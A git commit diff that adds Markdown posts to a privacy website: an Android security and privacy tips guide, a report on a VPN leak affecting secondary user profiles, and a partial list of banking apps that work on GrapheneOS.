mirror of
https://github.com/PrivSec-dev/privsec.dev.git
synced 2025-08-02 19:26:26 -04:00
Reorganize (#72)
* Reorganize Signed-off-by: Tommy <contact@tommytran.io>
This commit is contained in:
parent
46501875be
commit
bf55611133
37 changed files with 127 additions and 78 deletions
7
content/posts/_index.md
Normal file
7
content/posts/_index.md
Normal file
|
@ -0,0 +1,7 @@
|
|||
---
|
||||
title: Categories
|
||||
ShowReadingTime: false
|
||||
ShowWordCount: false
|
||||
---
|
||||
|
||||
Find the content you are looking for!
|
221
content/posts/android/Android Tips.md
Normal file
221
content/posts/android/Android Tips.md
Normal file
|
@ -0,0 +1,221 @@
|
|||
---
|
||||
title: "Android Tips"
|
||||
date: 2022-07-22
|
||||
tags: ['Operating Systems', 'Android', 'Privacy', 'Security']
|
||||
author: Tommy
|
||||
---
|
||||
|
||||
Android is a very secure and robust operating system out of the box. This post will be less of a "hardening guide", but more of a non-exhaustive list of tips when it comes to buying and using Android phones.
|
||||
|
||||
## Android Devices
|
||||
|
||||
### Recommended Phones
|
||||
|
||||

|
||||
|
||||
Google Pixel phones are the **only** devices I would recommend for purchase. Pixel phones have stronger hardware security than any other Android devices currently on the market, due to proper AVB support for third-party operating systems and Google's custom [Titan](https://security.googleblog.com/2021/10/pixel-6-setting-new-standard-for-mobile.html) security chips acting as the Secure Element.
|
||||
|
||||
When purchasing a device, you should buy one as new as possible. The software and firmware of mobile devices are only supported for a limited time, so buying new extends that lifespan as much as possible. Also, beginning with the **Pixel 6** and **6 Pro**, Pixel devices receive a minimum of 5 years of guaranteed security updates, ensuring a much longer lifespan compared to the 2-4 years competing OEMs typically offer.
|
||||
|
||||
### Phones to Avoid
|
||||
Avoid buying the Fairphone 4, which only has just over 2 years of full security updates since its release date despite them advertising 6 years of support. This is because the System on a Chip they use (Snapdragon 750G) only has 3 years of support from Qualcomm, and the SoC was already old when the phone came out. This is not to mention, the Fairphone 4 [uses the Android Verified Boot Test Key as their OEM keys](https://forum.fairphone.com/t/bootloader-avb-keys-used-in-roms-for-fairphone-3-4/83448/11), effectively making Verified Boot useless. In general, you should check for how long the SoC a phone uses is supported for and not blindly trust the phone manufacturer's claims.
|
||||
|
||||
You should also avoid buying the /e/ OS phones (sometimes branded as the Murena phones). /e/ OS in itself extremely insecure, not supporting verified boot, shipping userdebug build, [shipping months old version of Chromium, bundling years old version Orbot into their operating system then marketing it as "Advanced Privacy"](https://divestos.org/misc/e.txt), etc. They have recently also had an incident where their cloud service mishandled session keys and give users access to each other's files, then proceeded to [mislead the users that the server cannot see their files](https://community.e.foundation/t/service-announcement-26-may/41252/30) despite there being no end-to-end encryption.
|
||||
|
||||
You should also be very wary of low quality privacy branded phones like the Freedom Phone, BraX2 Phone, Volta Phone, and the like. These are cheap Chinese phones with the [Mediatek Helio P60](https://i.mediatek.com/p60) from 2018, which has already reached end-of-life or is near end-of-life. Needless to say, you should also avoid any vendor who claims they are Zero-day proof like this:
|
||||
|
||||

|
||||
|
||||
## Android-based Operating Systems
|
||||
|
||||

|
||||
|
||||
In certain cases, installing a custom Android-based operating system can help increase your privacy and security. This is rather tricky; however, as the vast majority of these operating systems (a.k.a. "custom ROMs") do exactly the opposite - breaking the Android security model, ruining your security while providing no or dubious privacy benefits.
|
||||
|
||||
I have written a detailed post on selecting your Android-based operating system, which you can find [here](/posts/os/choosing-your-android-based-operating-system).
|
||||
|
||||
**TLDR**: If you are using a modern Pixel, use [GrapheneOS](https://grapheneos.org). If you are on a device supported by [DivestOS](https://divestos.org), use DivestOS. Otherwise, stick to your stock operating system. Do not blindly use an OS just because it is advertised as "degoogled".
|
||||
|
||||
## Use New Android Versions
|
||||
|
||||
It's important to not use an [end-of-life](https://endoflife.date/android) version of Android. Newer versions of Android not only receive security updates for the operating system but also important privacy enhancing updates too. For example, [prior to Android 10](https://developer.android.com/about/versions/10/privacy/changes), any apps with the [`READ_PHONE_STATE`](https://developer.android.com/reference/android/Manifest.permission#READ_PHONE_STATE) permission could access sensitive and unique serial numbers of your phone such as [IMEI](https://en.wikipedia.org/wiki/International_Mobile_Equipment_Identity), [MEID](https://en.wikipedia.org/wiki/Mobile_equipment_identifier), your SIM card's [IMSI](https://en.wikipedia.org/wiki/International_mobile_subscriber_identity), whereas now they must be system apps to do so. System apps are only provided by the OEM or Android distribution.
|
||||
|
||||
## Do Not Root Your Phone
|
||||
|
||||
[Rooting](https://en.wikipedia.org/wiki/Rooting_(Android)) Android phones can decrease security significantly as it weakens the complete [Android security model](https://en.wikipedia.org/wiki/Android_(operating_system)#Security_and_privacy). This can decrease privacy should there be an exploit that is assisted by the decreased security. Common rooting methods involve directly tampering with the boot partition, making it impossible to perform successful Verified Boot. Apps that require root will also modify the system partition meaning that Verified Boot would have to remain disabled. Having root exposed directly in the user interface also increases the [attack surface](https://en.wikipedia.org/wiki/Attack_surface) of your device and may assist in [privilege escalation](https://en.wikipedia.org/wiki/Privilege_escalation) vulnerabilities and SELinux policy bypasses.
|
||||
|
||||
## Use a diceware passphrase, avoid pattern unlock
|
||||
|
||||
On Android, the phone unlock (Password, Pin, Pattern) is used to protect the encryption key for your device. Thus, it is vital that your unlock secret is secure and can withstand Bruteforce attacks.
|
||||
|
||||
Pattern unlock is extremely insecure and should be avoided at all cost. This is discussed in detail in the [Cracking Android Pattern Lock in Five Attempts](/researches/Cracking-Android-Pattern-Lock-in-Five-Attempts.pdf) research paper.
|
||||
|
||||
If you trust the hardware enforced rate limiting features (typically done by the [Secure Element](https://en.wikipedia.org/wiki/Secure_cryptoprocessor) or [Trusted Execution Environment](https://en.wikipedia.org/wiki/Trusted_execution_environment)) of your device, a 8+ digit PIN may be sufficient.
|
||||
|
||||
Ideally, you should be using a 8-10 word [diceware passphrase](https://en.wikipedia.org/wiki/Diceware) to secure your phone. This would make your phone unlock practically impossible to bruteforce, regardless of whether there is proper rate limiting or not.
|
||||
|
||||
## Use Global Toggles
|
||||
|
||||
Modern Android devices have global toggles for disabling Bluetooth and location services. Android 12 introduced toggles for the camera and microphone. When not in use, you should disable these features. Apps cannot use disabled features (even if granted individual permission) until re-enabled.
|
||||
|
||||
## Manage Android Permissions
|
||||
|
||||
[Permissions on Android](https://developer.android.com/guide/topics/permissions/overview) grant you control over what apps are allowed to access. Google regularly makes [improvements](https://developer.android.com/about/versions/11/privacy/permissions) on the permission system in each successive version. All apps you install are strictly [sandboxed](https://source.android.com/security/app-sandbox), therefore, there is no need to install any antivirus apps.
|
||||
|
||||
You can manage Android permissions by going to **Settings** → **Privacy** → **Permission Manager**. Be sure to remove from apps any permissions that they do not need.
|
||||
|
||||
## Enable VPN Killswitch
|
||||
|
||||
Android 7 and above supports a VPN killswitch and it is available without the need to install third-party apps. This feature can prevent leaks if the VPN is disconnected. It can be found in **Settings** → **Network & internet** → **VPN** → **Block connections without VPN**.
|
||||
|
||||
## Connectivity Check
|
||||
|
||||
Connectivity checks on Android [do not go through the VPN tunnel](https://mullvad.net/en/blog/2022/10/10/android-leaks-connectivity-check-traffic/) (they are not supposed to anyway). This is generally not a cause for concern, however, you should be aware that Google and a network observer on your internet service provider (ISP)'s network can see that there is an Android device with your actual IP address.
|
||||
|
||||
On GrapheneOS, connectivity checks by default are done with GrapheneOS's own servers, instead of with Google ones. A network observer on your ISP’s network can see that you are using a GrapheneOS device. If you are using a VPN and want to appear like a regular Android device to your ISP, go to **Settings** → **Network & internet** → **Internet connectivity check** and select **Standard (Google)** instead. Note that this will not stop a determined adversarial ISP from finding out you are not using stock OS [through your DNS fallback](https://grapheneos.org/faq#default-dns).
|
||||
|
||||
If you want to, you can disable connectivity check altogether. Note that this will stop captive portal from working.
|
||||
|
||||
- On GrapheneOS, go to **Settings** → **Network & internet** → **Internet connectivity check** and select **Disabled**
|
||||
- On other Android-based operating systems, you can [disable captive portal via ADB](https://gitlab.com/CalyxOS/calyxos/-/issues/1226#note_1130393164).
|
||||
|
||||
To disable:
|
||||
|
||||
```bash
|
||||
adb shell settings put global captive_portal_mode 0
|
||||
```
|
||||
|
||||
To re-enable:
|
||||
|
||||
```bash
|
||||
adb shell settings delete global captive_portal_mode
|
||||
```
|
||||
|
||||
## Media Access
|
||||
Quite a few applications allow you to "share" a file with them for media upload. If you want to, for example, tweet a picture to Twitter, do not grant Twitter access to your "media and photos", because it will have access to all of your pictures then. Instead, go to your file manager (documentsUI), hold onto the picture, then share it with Twitter.
|
||||
|
||||
If you are using GrapheneOS, you should utilize the Storage Scopes feature to force apps that request broad storage access permission to function with scoped storage.
|
||||
|
||||

|
||||
|
||||
## User Profiles
|
||||
|
||||
Multiple user profiles can be found in **Settings** → **System** → **Multiple users** and are the simplest way to isolate in Android.
|
||||
|
||||
With user profiles, you can impose restrictions on a specific profile, such as: making calls, using SMS, or installing apps on the device. Each profile is encrypted using its own encryption key and cannot access the data of any other profiles. Even the device owner cannot view the data of other profiles without knowing their password. Multiple user profiles are a more secure method of isolation.
|
||||
|
||||
Note that there is currently a [VPN leakage with secondary user profiles](/posts/os/android-vpn-leakage-with-secondary-user-profiles).
|
||||
|
||||
## Work Profile
|
||||
|
||||
[Work Profiles](https://support.google.com/work/android/answer/6191949) are another way to isolate individual apps and may be more convenient than separate user profiles.
|
||||
|
||||
A **device controller** such as [Shelter](https://gitea.angry.im/PeterCxy/Shelter#shelter) is required, unless you're using CalyxOS which includes one.
|
||||
|
||||
The work profile is dependent on a device controller to function. Features such as *File Shuttle* and *contact search blocking* or any kind of isolation features must be implemented by the controller. You must also fully trust the device controller app, as it has full access to your data inside of the work profile.
|
||||
|
||||
This method is generally less secure than a secondary user profile; however, it does allow you the convenience of running apps in both the work and personal profiles simultaneously.
|
||||
|
||||
## Baseband Modem Attack Surface Reduction
|
||||
|
||||
By default, your baseband modem will typically set to support just about every generation of mobile cellular technology, from 2G to 5G. This gives a large attack surface.
|
||||
|
||||
You can reduce this attack surface by limiting the baseband modem to just using the generation that in needs. In most cases, this would be 4G/LTE.
|
||||
|
||||
GrapheneOS has the LTE only mode exposed in settings. You can set this by going to **Settings** → **Internet** → **Your carrier name** → **Preferred network type** → **LTE Only**.
|
||||
|
||||
If your Android-based operating system does not expose this setting in the Settings app, or if you want to set your baseband modem to a less restrictive mode, dial `*#*#4636#*#*` then hit **Phone information**. Here, you can set preferred network type to just the generations that you intend to use. For example, if you only want to use 5G and 4G, you can set it to `NR/LTE`.
|
||||
|
||||
## Carrier Tracking
|
||||
|
||||
Carriers can track your coarse location via cell towers using the IMSI and IMEI broadcasted by your baseband modem. In order to avoid this type of tracking, you have to enable the airplane mode which would disable the baseband modem.
|
||||
|
||||
I have seen several common suggestions in the privacy community to mitigate this problem which does not actually work:
|
||||
|
||||
- **Removing the SIM Card**: The baseband modem will continue to contact the cell towers with its IMEI to prepare for emergency calls. In fact, this is how you are able to call `911` even when you do not have a SIM card inserted.
|
||||
|
||||
- **Using PGPP as a carrier**: The service randomizes your IMSI by regularly reprovisioning your eSIM. However, the IMEI broadcasted by the baseband modem would remain unchanged, allowing the carriers to track you anyways.
|
||||
|
||||
## SMS App
|
||||
|
||||
|
||||
|
||||
## Where to Get Your Applications
|
||||
|
||||
### GrapheneOS App Store
|
||||
|
||||
GrapheneOS's app store is available on [GitHub](https://github.com/GrapheneOS/Apps/releases). It supports Android 12 and above and is capable of updating itself. The app store has standalone applications built by the GrapheneOS project such as the [Auditor](https://attestation.app/), [Camera](https://github.com/GrapheneOS/Camera), and [PDF Viewer](https://github.com/GrapheneOS/PdfViewer). If you are looking for these applications, I highly recommend that you get them from GrapheneOS's app store instead of the Play Store, as the apps on their store are signed by the GrapheneOS's project own signature that Google does not have access to.
|
||||
|
||||
### Aurora Store
|
||||
|
||||
The [Aurora Store](https://auroraoss.com/download/AuroraStore/) is a proxy for the Google Play Store. It is great for privacy in the sense that it automatically gives you a disposable account to download apps, and it works on Android-based distributions that do not support Google Play Services. That being said, it lacks security features like certificate pinning and does not support Play Asset Delivery.
|
||||
|
||||
My recommendation is to stick with the Google Play Store unless your threat model calls for not logging into Google Services at all.
|
||||
|
||||
### F-Droid
|
||||
|
||||
F-Droid, despite being often recommended in the privacy community, has various security deficiencies. You can read more about them [here](/posts/android/f-droid-security-issues/).
|
||||
|
||||
I do not recommend that you use F-Droid at all unless you have no other choice to obtain certain apps. In some rare cases, there may be some apps which require the F-Droid version to work properly without Google Play Services. If you do end up using F-Droid, I highly recommend that you avoid the official F-Droid client (which is extremely outdated and targets API level 25) and use a more modern client with seamless updates such as [NeoStore](https://github.com/NeoApplications/Neo-Store). You should also avoid using the official F-Droid repository as much as possible and stick to the F-Droid repositories hosted by the app developers instead.
|
||||
|
||||
### GitHub
|
||||
|
||||
You can also obtain your apps directly from their GitHub repositories. In most cases, there would be a pre-built APK for you to download. You can verify the signature of the downloaded using apksinger:
|
||||
|
||||
- Install the [Android Studio](https://developer.android.com/studio) which includes `apksinger`. On macOS, `apksigner` can be found at `~/Library/Android/sdk/build-tools/<version>/apksigner`.
|
||||
- Run `apksigner verify --print-certs --verbose myCoolApp.apk` to verify the certificate of the apk.
|
||||
|
||||
After you have verified the signature of the apk and installed it on your phone, there are several strategies you can use to keep the application up-to-date.
|
||||
|
||||
The first strategy is to add the atom feed of the application's release page to an RSS Reader like [ReadYou](https://github.com/Ashinch/ReadYou) to get notified of new releases. You will still need to download and install the new releases manually. If you are confused, here is a video that could help with this process:
|
||||
|
||||
{{< youtube id="FFz57zNR_M0">}}
|
||||
|
||||
The second strategy is to use the [IzzyOnDroid](https://apt.izzysoft.de/fdroid/) F-Droid repository with a modern F-Droid client like [NeoStore](https://github.com/NeoApplications/Neo-Store), as mentioned [above](#f-droid). The IzzyOnDroid repository pulls new releases from various GitHub repositories to their server, which can then be automatically downloaded and installed by NeoStore. The downside of this strategy is that not every application on GitHub is on IzzyOnDroid, and sometimes IzzyOnDroid fails to pull a new release, resulting in you not getting any updates at all.
|
||||
|
||||
It should be noted that since Android has automatic signature checking for existing applications on the system, you only need to manually check the signature of the apk the first time you install an application. If you do use IzzyOnDroid to update the applications, you will need to manually confirm the first update of an application to authorize the NeoStore as the installation source. After that, future updates will be seamless.
|
||||
|
||||
## Google
|
||||
|
||||
If you are using a device with Google services, either your stock operating system or an operating system that safely sandboxes Google Play Services like GrapheneOS, there are a number of additional changes you can make to improve your privacy.
|
||||
|
||||
### Enroll in the Advanced Protection Program
|
||||
|
||||

|
||||
|
||||
If you have a Google account we suggest enrolling in the [Advanced Protection Program](https://landing.google.com/advancedprotection/). It is available at no cost to anyone with two or more hardware security keys with [FIDO2](/knowledge/multi-factor-authentication/#fido2-fast-identity-online) support.
|
||||
|
||||
The Advanced Protection Program provides enhanced threat monitoring and enables:
|
||||
|
||||
- Stricter two factor authentication; e.g. that [FIDO2](/posts/knowledge/multi-factor-authentication/#fido2-fast-identity-online) **must** be used and disallows the use of [SMS OTP](/posts/knowledge/multi-factor-authentication/#fido2-fast-identity-online), [TOTP](/posts/knowledge/multi-factor-authentication/#time-based-one-time-password-totp) and [OAuth](https://en.wikipedia.org/wiki/OAuth)
|
||||
- Only Google and verified third-party apps can access account data
|
||||
- Scanning of incoming emails on Gmail accounts for [phishing](https://en.wikipedia.org/wiki/Phishing#Email_phishing) attempts
|
||||
- Stricter [safe browser scanning](https://www.google.com/chrome/privacy/whitepaper.html#malware) with Google Chrome
|
||||
- Stricter recovery process for accounts with lost credentials
|
||||
|
||||
If you use non-sandboxed Google Play Services (common on stock operating systems), the Advanced Protection Program also comes with [additional benefits](https://support.google.com/accounts/answer/9764949?hl=en) such as:
|
||||
|
||||
- Not allowing app installation outside of the Google Play Store, the OS vendor's app store, or via [`adb`](https://en.wikipedia.org/wiki/Android_Debug_Bridge)
|
||||
- Mandatory automatic device scanning with [Play Protect](https://support.google.com/googleplay/answer/2812853?hl=en#zippy=%2Chow-malware-protection-works%2Chow-privacy-alerts-work)
|
||||
- Warning you about unverified applications
|
||||
|
||||
### Google Play System Updates
|
||||
|
||||
In the past, Android security updates had to be shipped by the operating system vendor. Android has become more modular beginning with [Android 10](https://www.android.com/android-10/), and Google [can push security updates](https://blog.google/products/android-enterprise/android-10-security/) for **some** system components via the privileged Play Services.
|
||||
|
||||
If you have an EOL device shipped with Android 10 or above (shipped beginnning 2020) and are unable to run any of our recommended operating systems on your device, you are likely going to be better off sticking with your OEM Android installation (as opposed to an insecure operating system here such as LineageOS or /e/ OS). This will allow you to receive **some** security fixes from Google, while not violating the Android security model by using an insecure Android derivative and increasing your attack surface. You should still upgrade to a supported device as soon as possible.
|
||||
|
||||
### Disable Advertising ID
|
||||
|
||||
All devices with Google Play Services installed automatically generate an [advertising ID](https://support.google.com/googleplay/android-developer/answer/6048248?hl=en) used for targeted advertising. Disable this feature to limit the data collected about you.
|
||||
|
||||
On Android distributions with [Sandboxed Google Play](https://grapheneos.org/usage#sandboxed-google-play), go to **Settings** → **Apps** → **Sandboxed Google Play** → **Google Settings** → **Ads**, and select *Delete advertising ID*.
|
||||
|
||||
On Android distributions with privileged Google Play Services (such as stock OSes), the setting may be in one of several locations. Check
|
||||
|
||||
- **Settings** → **Google** → **Ads**
|
||||
- **Settings** → **Privacy** → **Ads**
|
||||
|
||||

|
||||
|
||||
You will either be given the option to delete your advertising ID or to *Opt out of interest-based ads*, this varies between OEM distributions of Android. If presented with the option to delete the advertising ID that is preferred. If not, then make sure to opt out and reset your advertising ID.
|
|
@ -0,0 +1,29 @@
|
|||
---
|
||||
title: "Android VPN Leakage with Secondary User Profiles"
|
||||
date: 2022-10-10
|
||||
tags: ['Operating Systems', 'Android', 'Privacy']
|
||||
author: Tommy
|
||||
---
|
||||
|
||||
**Before We Start**...
|
||||
|
||||
I have been aware of this issue for awhile now (since at least Android 11), though I have not done enough testing to see what actually causes the leak nor do I have any workaround at the moment. My guess is that applications which launch early when you log into a secondary profile can bypass the VPN killswitch.
|
||||
|
||||
I have reported it on [Google's issue tracker](https://issuetracker.google.com/issues/252851265).
|
||||
|
||||
## The Leak
|
||||
|
||||
You can reproduce the leak by doing the following:
|
||||
|
||||
1. Create a new user profile (you need to create a secondary user profile for this, as it is not reproducible on your owner profile or a work profile). Do not log into your Google account at this stage.
|
||||
2. Sideload a VPN app. The leak happens with every VPN provider I have tried (since it is likely a platform issue), though if you do not have a VPN subscription I would recommend getting a free one with [ProtonVPN](https://protonvpn.com).
|
||||
3. Setup the VPN and the [Android VPN killswitch](/posts/os/android-tips/#enable-vpn-killswitch).
|
||||
4. Log into your Google account through Play Services.
|
||||
5. Restart the phone. Open the secondary user profile again.
|
||||
6. Go to Google's [My Devices](https://myaccount.google.com/device-activity) page. Observe that one of the sessions for your phone has your actual location obtained with GeoIP. In some cases, your actual IP address will be shown there as well.
|
||||
|
||||
## Notes
|
||||
|
||||
1. It is unlikely that this is caused by Play Services being privileged applications. This issue is reproducible on GrapheneOS with the Sandboxed Play Services (which runs as a normal, unprivileged application) as well.
|
||||
|
||||
2. More testing is needed to find the root cause of the problem. I do not think that this is Play Services specific. Unfortunately, I do not have access to a router to do a packet capture right now. I would appreciate it if someone can help me get to the bottom of this. You can find my contact information [here](https://tommytran.io/contact/).
|
|
@ -0,0 +1,282 @@
|
|||
---
|
||||
title: "Banking Applications Compatibility with GrapheneOS"
|
||||
date: "2022-01-26"
|
||||
tags: ['Applications', 'Android']
|
||||
author: akc3n, Tommy
|
||||
---
|
||||
|
||||
This is a list of banking applications known to work with [GrapheneOS](https://grapheneos.org).
|
||||
|
||||
Banking apps are a very problematic app for security and privacy focused operating systems, or even alternative OSes, due to the app being incompatible with majority of hardening, having a hard dependency on Google Play services, or require passing SafetyNet `ctsProfileMatch` and `basicIntegrity`.
|
||||
|
||||
GrapheneOS passes SafetyNet `basicIntegrity`, but it is not certified by Google so it does not pass `ctsProfileMatch`.[^1]
|
||||
|
||||
[GrapheneOS's usage guide](https://grapheneos.org/usage) on [banking apps](https://grapheneos.org/usage#banking-apps).
|
||||
|
||||
---
|
||||
|
||||
## List of Banking Apps
|
||||
|
||||
### Australia
|
||||
|
||||
- [ANZ Australia](https://play.google.com/store/apps/details?id=com.anz.android.gomoney) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/157)
|
||||
- [Bank Australia App](https://play.google.com/store/apps/details?id=com.fusion.banking) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/55)
|
||||
- [Bendigo Bank](https://play.google.com/store/apps/details?id=com.bendigobank.mobile) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/88)
|
||||
- [CommBank](https://play.google.com/store/apps/details?id=com.commbank.netbank) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/75)
|
||||
- [NAB Mobile Banking](https://play.google.com/store/apps/details?id=au.com.nab.mobile) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/76)
|
||||
- [ubank – Daily Money App](https://play.google.com/store/apps/details?id=au.com.bank86400) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/156)
|
||||
- [Up Money](https://play.google.com/store/apps/details?id=au.com.up.money&hl=en) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/102)
|
||||
- [Westpac](https://play.google.com/store/apps/details?id=org.westpac.bank) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/77)
|
||||
|
||||
### Austria
|
||||
|
||||
- [Bank Austria Mobile Banking](https://play.google.com/store/apps/details?id=com.bankaustria.android.olb) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/15)
|
||||
- [Mein ELBA-App](https://play.google.com/store/apps/details?id=at.rsg.pfp) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/62)
|
||||
|
||||
### Belgium
|
||||
|
||||
- [Belfius Mobile](https://play.google.com/store/apps/details?id=be.belfius.directmobile.android) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/110)
|
||||
- [ING Belgium](https://play.google.com/store/apps/details?id=com.ing.banking) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/45)
|
||||
|
||||
### Brazil
|
||||
|
||||
- [Caixa](https://play.google.com/store/apps/details?id=br.com.gabba.Caixa) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/89)
|
||||
- [Nubank](https://play.google.com/store/apps/details?id=com.nu.production) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/92)
|
||||
- [Santander Brasil](https://play.google.com/store/apps/details?id=com.santander.app) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/151)
|
||||
- [Santander Empresas](https://play.google.com/store/apps/details?id=com.santandermovelempresarial.app) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/153)
|
||||
- [Santander Way: App de cartões](https://play.google.com/store/apps/details?id=br.com.santander.way) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/152)
|
||||
|
||||
### Canada
|
||||
|
||||
- [Affinity Credit Union](https://play.google.com/store/apps/details?id=ca.affinitycu.mobile&hl=en) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/71)
|
||||
- [BMO Mobile Banking](https://play.google.com/store/apps/details?id=com.bmo.mobile) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/19)
|
||||
- [EQ Bank Mobile Banking](https://play.google.com/store/apps/details?id=com.eqbank.eqbank) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/103)
|
||||
- [KOHO Financial](https://play.google.com/store/apps/details?id=ca.koho) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/104)
|
||||
- [RBC Mobile](https://play.google.com/store/apps/details?hl=en&id=com.rbc.mobile.android) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/32)
|
||||
- [QuestMobile: Invest & Trade](https://play.google.com/store/apps/details?id=com.questrade.questmobile) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/115)
|
||||
- [Questrade](https://play.google.com/store/apps/details?id=com.questrade.my) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/114)
|
||||
- [Simplii Financial](https://play.google.com/store/apps/details?id=com.pcfinancial.mobile) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/17)
|
||||
- [Tangerine Mobile App](https://play.google.com/store/apps/details?id=ca.tangerine.clients.banking.app) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/16)
|
||||
- [Wealthsimple](https://play.google.com/store/apps/details?id=com.wealthsimple) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/116)
|
||||
- [Wealthsimple Invest](https://play.google.com/store/apps/details?id=com.wealthsimple.trade) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/117)
|
||||
|
||||
### Czech Republic
|
||||
|
||||
- [AirBank](https://play.google.com/store/apps/details?id=cz.airbank.android) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/31)
|
||||
- [CREDITAS Banking](https://play.google.com/store/apps/details?id=cz.creditas.richee) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/78)
|
||||
|
||||
[ToC ↩︎](#table-of-contents)
|
||||
|
||||
### Denmark
|
||||
|
||||
- [Mobilbank DK – Danske Bank](https://play.google.com/store/apps/details?id=com.danskebank.mobilebank3.dk) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/5)
|
||||
- [MobilePay](https://play.google.com/store/apps/details?id=dk.danskebank.mobilepay) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/7)
|
||||
- [MitID](https://play.google.com/store/apps/details?id=dk.mitid.app.android) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/121)
|
||||
- [NemID nøgleapp](https://play.google.com/store/apps/details?id=dk.e_nettet.mobilekey.everyone) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/10)
|
||||
- [Nordea Mobile](https://play.google.com/store/apps/details?id=dk.nordea.mobilebank) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/118)
|
||||
|
||||
### Finland
|
||||
|
||||
- [S-mobiili](https://play.google.com/store/apps/details?id=fi.spankki) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/43)
|
||||
|
||||
### France
|
||||
|
||||
- [Boursorama Banque](https://play.google.com/store/apps/details?id=com.boursorama.android.clients) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/147)
|
||||
- [Crédit Mutuel de Bretagne](https://play.google.com/store/apps/details?id=com.arkea.android.application.cmb&gl=FR) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/150)
|
||||
- [La Banque Postale](https://play.google.com/store/apps/details?id=com.fullsix.android.labanquepostale.accountaccess) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/14)
|
||||
- [Ma Banque](https://play.google.com/store/apps/details?id=fr.creditagricole.androidapp&gl=FR) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/73)
|
||||
|
||||
### Germany
|
||||
|
||||
- [Commerzbank Banking](https://play.google.com/store/apps/details?id=de.commerzbanking.mobil&hl=en_US&gl=US) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/22)
|
||||
- [Deutsche Bank Mobile](https://play.google.com/store/apps/details?id=com.db.pwcc.dbmobile) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/38)
|
||||
- [Digitales Bezahlen](https://play.google.com/store/apps/details?id=de.fiduciagad.android.wlwallet) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/160)
|
||||
- [DKB](https://play.google.com/store/apps/details?id=com.dkbcodefactory.banking) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/106)
|
||||
- [flatex next](https://play.google.com/store/apps/details?id=de.xcom.flatexde) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/59)
|
||||
- [ING Banking to go](https://play.google.com/store/apps/details?id=de.ingdiba.bankingapp&hl=de&gl=US) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/48)
|
||||
- [Kontist](https://play.google.com/store/apps/details?id=com.kontist&hl=en_US&gl=US) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/23)
|
||||
- [N26 — The Mobile Bank](https://play.google.com/store/apps/details?id=de.number26.android&hl=en_US&gl=US) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/21)
|
||||
- [Penta — Business Banking App](https://play.google.com/store/apps/details?id=com.getpenta.app&hl=en_US&gl=US) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/24)
|
||||
- [PSD Banking](https://play.google.com/store/apps/details?id=de.psd.banking.app) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/159)
|
||||
- [Santander Banking](https://play.google.com/store/apps/details?id=de.santander.presentation) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/119)
|
||||
- [SecureGo plus](https://play.google.com/store/apps/details?id=de.fiduciagad.securego.wl) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/161)
|
||||
- [Sparkasse](https://play.google.com/store/apps/details?id=com.starfinanz.smob.android.sfinanzstatus) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/44)
|
||||
- [Tomorrow Mobile Banking](https://play.google.com/store/apps/details?id=one.tomorrow.app&hl=en_US&gl=US) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/20)
|
||||
- [Volksbanken Raiffeisenbanken](https://play.google.com/store/apps/details?id=de.fiduciagad.banking.vr) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/36)
|
||||
- [Volksbanken Raiffeisenbanken — Companion App](https://play.google.com/store/apps/details?id=de.fiduciagad.android.vrwallet) - [Report](https://github.com/PrivSec-dev/banking-apps-compat-report/issues/35)
|
